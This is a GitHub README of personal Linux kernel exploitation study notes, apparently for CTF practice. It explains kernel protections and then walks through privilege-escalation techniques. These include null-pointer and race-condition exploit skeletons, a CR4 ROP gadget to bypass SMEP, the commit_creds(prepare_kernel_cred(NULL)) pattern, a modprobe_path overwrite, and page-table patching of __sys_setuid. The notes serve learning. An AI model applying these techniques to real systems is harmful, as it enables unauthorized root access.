Kernel Exploitation Notes

This will be my kernel exploitation notes. This also includes a set of code snippets & helper scripts to make exploitation faster in future.

What you will find here:

I'll try to make it as simple as possible, incase anyone in the future needs this. However, this will suppose there's a minimum knowledge of binary exploitation (Stack, Heap, protections...) so, user-land exploitation will not be explained here. This is meant to introduce kernel exploitation & dive into it.

I'll be updating this as I make progress, I may mess up sometimes, I may be wrong in some details, I'll try to fix that if I find out about it, so if you find something weird or something wrong, please let me know about it and I'll fix it or add more details if needed, it'll be much appreciated.

What we'll go through:

Resources
What's a kernel?
User space VS Kernel space
Kernel Protections
From user to kernel & vice versa
Kernel Credentials
How to exploit?
Attacking Techniques

Resources

More resources will be included below.

What's a kernel?

Connecting hardware with software, provides an abstraction layer to applications (executing in userland) to interact with the hardware. It's basically the brain of the OS.

User space VS Kernel space

Kernel space is what we call Ring 0 (See below for reference). This has access to everything BUT in the hard way, no easy access/abstractions. Basically, any privilege escalation exploit that's relation to linux kernel, or "jailbreaking" for IOS & consoles involves exploiting kernel code, to gain a higher privilege then return to user space with the new privilege.

User space is what we are in all of the time. Every single app you run or use (doesn't matter which permission you used to run it) will be in user space. This is the last ring, which is the least privileged one.

Now, how do these spaces connect? Interrupts.

When we say interrupts, there is a large list of possible interrupts that may happen. For example, sending a SIGINT would result in an interrupt, receiving a network packet would result in an interrupt...

There's also system calls (syscall.sh). For each syscall, there'll be an interrupt.

The kernel will handle each interrupt accordingly, for example, for an open syscall, it'll look up the file, handle access permissions, open it & return a file descriptor. (Not much details but, just an abstract view for now)

Now, you might think that, for hardware as example, there are lot of brands, versions & models for a very specific device, maybe a keyboard. The kernel will be handling the communication with this device yes, but how does it know everything? How does it know how to communicate with various devices, with different versions & so on.

Here we introduce modules. What if you want to extend your OS? Design a new feature & you need kernel access? How would it be possible? Ofc, you can write your own kernel but that's not a very friendly solution. We have modules to save us! A module is a piece of code that can be loaded & unloaded from the kernel that'll be able to handle specific interrupts. We can use the commands lsmod, rmmod & insmod to manage our modules (Ofc, need root perm).

A module should be running in ring 1/2 but those levels are merged with ring 0, so for linux kernel, our modules will be running in kernel level.

In linux, a device (for example, your memory or storage device) creates a virtual file for you to communicate with, located under /dev, that's the device's module responsible for that! Ofc, a module doesn't have to create a device file under /dev, it can for example add a new syscall or something else!

When we say User Space (or user land), we say stack, heap, ASLR, RELRO, PIE, NX... Moving on to Kernel Space, this memory space is 100% separate from the userland, it has it's own stack, heap, memory address range... There's also different type of protections.

Kernel Protections

Base knowledge:

We have 2 different spaces, kernel space & user space. User space contains user app's code + data (memory), Kernel space contains kernel code & memory.

Control Registers:

A control register is used to control the behavior of the CPU. In x86-64 CPUs, we have a register called CR4, this is called Control Register. for example, if the bit 20 is set to 1, this means SMEP is enabled, bit 21 for SMAP. More about this register can be found here.

SMEP: Supervisor Mode Execution Protection

This protection basically prevents the execution of code from user space when we are in kernel context.

SMAP: Supervisor Mode Access Protection

This protection prevents execution & access to memory from user space (other than some specific methods that are meant for that.)

Kallsyms

This is a file located at /proc/Kallsyms.

Now, the kernel can be considered as any other ELF binary, it has code, it has functions, it has symbols. This file gives us all of the kernel symbols with their associated addresses. It's like a /proc/self/maps but with more details.

However, this file has been blocked in some kernels, making it return 0 for symbol addresses for low privileged users. Always check incase it's exposed, you never know.

mmap_min_addr

This protection sets a minimum value for mmap to accept, protecting against NULL pointer dereferences. Since kernel addresses are usually in the lower range of addresses, this can protect from allocating that range of memory by a user space application.

KASLR

This is similar to ASLR for userspace.

Kernel Page-Table Isolation (KPTI)

This protection was introduced after Meltdown vulnerability, which used speculative execution added in CPUs to read protected memory addresses, such as kernel space addresses. The vulnerability uses a time-based attack using CPU cache to detect whether or not an instruction has been executed, and since CPUs did not implement checks on protected addresses in speculative execution, an attacker can successfully execute read operations from a protected memory address. For more on this, feel free to check wiki page or this youtube video explaining both Meltdown & Spectre vulnerabilities.

In order to fix these vulnerabilities, CPU manufacturers couldn't change the design of already existing CPUs therefore, a software fix had to be created, which lead to the introduction of a new protection to linux kernel (& other OS kernels) called Kernel Page-Table Isolation (KPTI), which consists of separating the memory pages used in kernel mode & in user mode.

Starting off with what's a memory page? Basically, a memory page is a mapping from virtual memory into physical memory. The physical memory is divided into multiple pages, which then mapped into virtual memory pages for processes.

Previously, both the kernel memory space & the user memory space existed in the same page, allowing access in user mode to kernel memory space. With KPTI, the kernel mode & the user mode will use different pages, with the kernel mode page includes both user memory space & kernel memory space and the user mode page includes only the user memory space & a small section of kernel memory space.

This separation prevents unauthorized access to protected memory in user mode execution.

From user to kernel & vice versa

We'll take a system call as example. The moment you execute syscall (or int 0x80 if you're on 0x86), an interruption will take place. The kernel will handle this interruption, by having a module for example handling that specific call.

The kernel will save the user space context (RIP, stack address, flags...) then switch to a kernel context.

Returning now from kernel to a user context, the kernel needs to restore the user context then jump back to where it has stopped. To restore the context, we have 2 steps:

swapgs: This is for 64bit architecture, This instruction is intended to set up context switching, or more particular to switch register context from a user land to kernel land and vice-versa. Specifically, swapgs swaps the value of the gs register so that it refers to either a memory location in the running application, or a location in the kernel’s space. This is a requirement for switching contexts!
iretq/sysretq: Either of these can be used to perform the actual context switch between user land and kernel land.
- iretq requires five user land register values in this order:
  - rip, cs, rflags, sp, ss. So, we have to push them to the stack in the reverse before executing.
- sysretq when executed moves the value in rcx to rip, which means we have to set up our return adr. Additionally, it moves rflags to r11 which may require additional handling. Finally, sysretq expects the value in rip to be in canonical form, which basically means that bits 48 through 63 of that value must be identical to bit 47 (compare sign extension). If that's not the case, we run in a general protection fault!The sysret instructions seems to have stricter constraints but also have fewer registers involved and generally seems to be faster when executed.

There is also the option to use sysexit instruction (doc), which takes RDX value & sets it as RIP, ECX value & sets it as RSP.

The use of sysexit is linked to Fast System Calls, which simplifies the process a lot and requires less work! This will also work on both x86 & x86-64 architectures. For Fast System Calls, AMD offers the SYSCALL/SYSRET pair, while Intel offers SYSENTER/SYSEXIT.

Kernel Credentials

Okay, so our main goal is to escalate our privileges, therefore, we'll need to go through this. In linux, every thread has a structure task_struct containing it's information, one of those is the thread credentials. In that structure, we have a pointer to a struct cred (Reference: task_struct)

So, if we can change our current thread's cred structure value, we can escalate our privileges! Luckly, there are 2 kernel calls that can help with this:

prepare_kernel_cred: Calling prepare_kernel_cred(NULL) will create a new structure for us with root privileges! Ain't that something?
commit_creds: This function takes a cred structure & applies it to our current thread, so basically we'll be calling commit_creds(prepare_kernel_cred(NULL)) to become root.

Both these functions use fastcall calling convention, means parameters are passed through rax, edx, ecx.

How to exploit?

This is a basic section, we'll go in more details later on with more examples. So what we'll be doing is mainly interacting with linux modules. A module can create a device file, located in /dev, add a new syscall or register a character device. There might be some other ways, since you're like, kernel level?

For a device file, you can simply open the file & interact with it (R/W):

dev = open(MOD_DEV, O_RDWR);
read(dev, buff, size);
write(dev, buff, size);

Or if it's a syscall, you should know what you can do already since you're here.

Last, you can use ioctl to communicate with the module. We'll get more info on this later.

Attacking Techniques

Buffer overflow

A buffer overflow vulnerability in kernel land is similar to user land, we might face a canary if enabled, we will have to leak it, eventually we can do a ROP chain (will be discussed below)... There is not much to talk about here.

Null pointer dereferences

In nowadays systems, there's a minimum value for the addresses that can be mmaped by non-root users, to view this on your system, you can check

cat /proc/sys/vm/mmap_min_addr

So what's this exploit about?

If we have the following code:

struct something{
  int (*fn_ptr)(void* param);
} x;

void main(){
  x.fn_ptr();
}

As an initial value, x.fn_ptr should be NULL, which means 0. This would result in a memory error, but what if we can allocate a memory chunk starting at address 0x0? The above code would actually work if we set a proper value!

So what we can do is

void main()
{
  mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);

  unsigned long *p = 0;
  p[0] = 0xdeadbeef;

  x.fn_ptr();
}

And this will call 0xdeadbeef for us! Ofc the mmap call wouldn't work if your /proc/sys/vm/mmap_min_addr is not 0, and that's one of the protections we talked about earlier.

Concurrent execution

In user-space applications, when we write a function & we do not use any sort of concurrent execution methods (exp. threads), we should be safe from concurrent execution attacks.

Now, looking into kernel-space, things are a bit different. Let's suppose we have this kernel module:

struct module_struct {
  ssize_t (*fn_pointer)();
} global_instance;

static ssize_t some_valid_function()
{
  // ...
}


static ssize_t module_read(struct file *f, char __user *buf, size_t len, loff_t *off)
{
  return (global_instance.fn_pointer)();
}

static ssize_t module_write(struct file *f, const char __user *buf,size_t len, loff_t *off)
{
  // ...
  global_instance.fn_pointer = 0;
  // ...
  global_instance.fn_pointer = &some_valid_function;
}

At first glance, this code might seem safe, however, if you become aware that the calls to module_read & module_write from user-space programs are executed in paralel, this might open up the door for a race in order to get a null pointer dereference.

To simplify things, we'll use a null pointer dereference & consider that we are able to allocate address 0x0 (mmap_min_addr = 0).

How can we attack this piece of code? Simply run multiple threads or use a fork, one will call module_write & the other will call module_read. And hope that the gap between global_instance.fn_pointer = 0; & global_instance.fn_pointer = &some_valid_function; would take long enough to run, to give you more chance to call fn_pointer while it's still NULL.

Example using fork:

void main(){
  char shellcode[] = "...";

  mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
  memcpy(0, shellcode, sizeof(shellcode));

  dev = open_dev();
  if (fork() == 0)
  {
    read(dev, te, 5);
    // Child becomes root if we are lucky enough.
  }
  else
  {
    write(dev, buff, size);
  }
}

Bypassing SMEP

To check for SMEP, we can check /proc/cpuinfo for smep flag. We can run cat /proc/cpuinfo | grep smep to get direct results.

As we talked earlier about Control Registers, they are simply registers. This means we can change their values using assembly instructions, for example executing mov cr4, 0x1407e0 will disable SMEP for us! What's important here is to use a value with the 20th bit set to 0. This value can be a constant value, you can get it by debugging.

How to do that now? Well, since we cannot execute user-space code, it'll be either a shellcode in kernel-space OR our good old friend, ROP chains.

ROP Chains

A ROP chain in kernel-space is the same as we are used to before in user land. We have a bzImage or a vmlinuz, which contains the compressed linux kernel. To search for ROP gadgets, we will have to decompress it. You can find here a useful bash script to automatically decompress it. Usage like following:

./extract-image.sh ./bzImage > vmlinux

Now, examining our vmlinux file, we find it's an ELF & we can run ropper to find ROP gadgets!

Going back to bypassing SMEP, we might stumble upon these 2 gadgets:

mov cr4, eax; pop ebp; ret;
pop eax; ret;

which, if you are already familiar with ROP chains in user land, you would know that these are enough to change the value of CR4 register & therefore, disabling SMEP.

Arbitrary Write

Let's suppose we currently have an arb. write vulnerability, how can we make use of this?

Starting off with modprobe_path. What happens when you run a file with an unknown magic bytes in linux? Just to be clear here, magic bytes are the first 8 bytes of a file in linux, they are used to identify the "extension" (if you are a windows user) of the file, and which program will be used to execute this file. Now, if these magic bytes are unknown, linux kernel would run a program called modprobe as an attempt to identify which program should be used to run this file. Luckly for us, the kernel stores the path of modprobe in a memory variable, called modprobe_path! On top of this, modprobe is executed as root! We cannot ask for more at this point.

So, the strategy is overwriting modprobe_path to a controlled binary/shell script that'll give us root privileges later on. Simple right?

A much more detailed doc is kernelpwn by smallkirby which is definetly worth looking at! (It got lota interesting stuff too worth checking)

One important condition for this technique to work is CONFIG_STATIC_USERMODEHELPER must not be defined (when building the kernel). That is used to hard-code the value of modprobe path, the variable modprobe_path will still exist but overwriting it will be useless! In order to verify if it's defined or no, we can execute the following:

/ # cat /proc/kallsyms | grep call_usermodehelper_setup
ffffffff810c8c80 T call_usermodehelper_setup
ffffffff82458118 r __ksymtab_call_usermodehelper_setup
ffffffff82477e3d r __kstrtab_call_usermodehelper_setup
ffffffff8247c3c4 r __kstrtabns_call_usermodehelper_setup

The above is the case when CONFIG_STATIC_USERMODEHELPER is defined. Another method to verify would be checking call_usermodehelper_setup disassembly. For more details check this out (by smallkirby).

Another way to gain root would be overwriting cred structure for the current thread. A good reference to this is this writeup.

Basically, linux kernel keeps track of each process' credential in a struct, containing the task's uid & gid. Overwriting these to 0 will give us to root. This technique however requires a memory read to find the creds structure for current process in memory.

You can find the structure definition here, this is an old version and only used as an example.

Another technique is changing the kernel's code! But you might ask, the kernel code should be in a R-X memory page no? Right, and we will change that!

Our first option is by changing CR0 register, by setting the 16th bit to 0, we will become able to write to read-only pages when we are in kernel mode. Another option is to update the page permissions, one great writeup that'll guide us through this is OverTheWire Advent Bonanza 2018 - Snow Hammer.

Let's take an example, we will try to change the code of __sys_setuid function located at 0xffffffff81031f5e.

First, we need to understand how pages are managed by the kernel. We start with Page Map Level 4 table, we can find the physical address of this structure by inspecting CR3 register.

Now, how can we access this physical memory? We can make use of qemu's monitor in order to dump the physical memory into a file, we can do so by adding -monitor tcp::5555,server,nowait to qemu's args & later connecting to the specified port, we can use telnet to do so.

After connecting, we can view registers (or can use gdb for this too) & save the physical memory:

(qemu) pmemsave 0 0x8000000 memdump
(qemu) info registers
CR0=80050033 CR2=0000000000dc57b8 CR3=000000000775a000 CR4=000006b0

We can now view the physical memory at 0x000000000775a000, this is the Page Map Level 4 table.

$ xxd -e -g8 -c8 -a -s 0x775a000 -l 0x1000 memdump
0775a000: 8000000007745067  gPt.....
0775a008: 0000000000000000  ........
*
0775a7f8: 8000000007771067  g.w.....
0775a800: 0000000000000000  ........
*
0775a880: 0000000001b47067  gp......
0775a888: 0000000000000000  ........
*
0775ac90: 0000000000080067  g.......
0775ac98: 0000000000000000  ........
*
0775aea0: 0000000006370067  g.7.....
0775aea8: 0000000000000000  ........
*
0775afe0: 0000000006b6f067  g.......
0775afe8: 0000000000000000  ........
0775aff0: 0000000000000000  ........
0775aff8: 0000000001a16067  g`......

Examining the address we are looking for now:

0xffffffff81031f5e = 0b 1111111111111111 111111111 111111110 000001000 000110001 111101011110
                                            PML4      PML3      PT        PTE       offset

We have our PML4 index "111111111" = 511, multiplied by the entry size 8, we have our offset at 0xff8. This gives us 0775aff8: 0000000001a16067 which is a physical address. The 0x67 at the end are flags we can ignore.

Continuing, we examine the physical address 0x01a16067, containing Page Map Level 3

$ xxd -e -g8 -c8 -a -s 0x0000000001a16000 -l 0x1000 memdump
01a16000: 0000000000000000  ........
*
01a16ff0: 0000000001a17063  cp......
01a16ff8: 0000000001a18067  g.......

Which gives us after calculating the offset (0xff0) , we get 01a16ff0: 0000000001a17063, same as earlier, 0x63 are flags.

Now, we have the page table at address 0x01a17000. We can examine this physical address:

$ xxd -e -g8 -c8 -a -s 0x0000000001a17000 -l 0x1000 memdump
01a17000: 0000000000000000  ........
*
01a17040: 00000000010001e1  ........
01a17048: 00000000012001e1  .. .....
01a17050: 00000000014001e1  ..@.....
01a17058: 0000000007869163  c.......
01a17060: 80000000018001e1  ........
01a17068: 0000000007868063  c.......
01a17070: 0000000000000000  ........
*
01a17ff8: 0000000000000000  ........

Same as earlier, we calculate our offset (0b000001000 * 8 = 0x40), gives us 01a17040: 00000000010001e1. This value is contains our page flags!

Now, we have to find the virtual address that's pointing to this physical address. We can examine info tlb in qemu monitor to identify the base virtual address that's mapped to the TE, in our case 0xffffffff81a17000. We can also confirm this in gef by running xinfo:

gef> xinfo 0xffffffff81a17000
---------------------------------------------------------------- xinfo: 0xffffffff81a17000 ----------------------------------------------------------------
Virtual address start-end              Physical address start-end             Total size   Page size   Count  Flags
0xffffffff81a00000-0xffffffff81c00000  0x0000000001a00000-0x0000000001c00000  0x200000     0x1000      512    [RW- KERN ACCESSED DIRTY GLOBAL]
Offset (from virt mapped):  0xffffffff81a00000 + 0x17000
Offset (from phys mapped):  0x1a00000 + 0x17000

Back to the 00000000010001e1 we found, in binary format below are some flags:

0b1000000000000000111100001
                        |||_ Present bit
                        ||__ Writeable flag (we will flip this)
                        |___ User-Accessible flag

And this is a RW section!

After changing .text segment to RWX, we will either write a shellcode or patch an existing function. An example of a patch we can do is to change setuid handler. We can see below setuid code:

long __sys_setuid(uid_t uid)
{
    [...]
    new = prepare_creds();
    [...]
    return commit_creds(new);
}

One potential patch is to change prepare_creds to prepare_kernel_cred, and we can obtain root credential that will be passed to commit_creds.

Let's take an example:

0xffffffff81031f5e: __sys_setuid
0xffffffff81039cab: prepare_creds
0xffffffff81039ea6: prepare_kernel_cred

Examining the assembly:

gef> x/20i 0xffffffff81031f5e
   0xffffffff81031f5e:  cmp    edi,0xffffffff
   0xffffffff81031f61:  mov    rax,0xffffffffffffffea
   0xffffffff81031f68:  je     0xffffffff81032016
   0xffffffff81031f6e:  push   r12
   0xffffffff81031f70:  push   rbp
   0xffffffff81031f71:  mov    ebp,edi
   0xffffffff81031f73:  push   rbx
   0xffffffff81031f74:  push   rcx
   0xffffffff81031f75:  call   0xffffffff81039cab
   0xffffffff81031f7a:  mov    rbx,rax

We are interested in the call 0xffffffff81039cab instruction, patching it to call 0xffffffff81039ea6, which is 16bytes write, is enough to give us root when executing setuid syscall.

Name		Name	Last commit message	Last commit date
Latest commit History 21 Commits
.vscode		.vscode
Challenges/Safe Compressor		Challenges/Safe Compressor
Template		Template
Writeups		Writeups
helpers		helpers
res		res
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

Kernel Exploitation Notes

Resources

What's a kernel?

User space VS Kernel space

Kernel Protections

From user to kernel & vice versa

Kernel Credentials

How to exploit?

Attacking Techniques

About

Uh oh!

Releases

Packages

Languages

M0ngi/Kernel-Exploitation-Notes

Folders and files

Latest commit

History

Repository files navigation

Kernel Exploitation Notes

Resources

What's a kernel?

User space VS Kernel space

Kernel Protections

From user to kernel & vice versa

Kernel Credentials

How to exploit?

Attacking Techniques

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages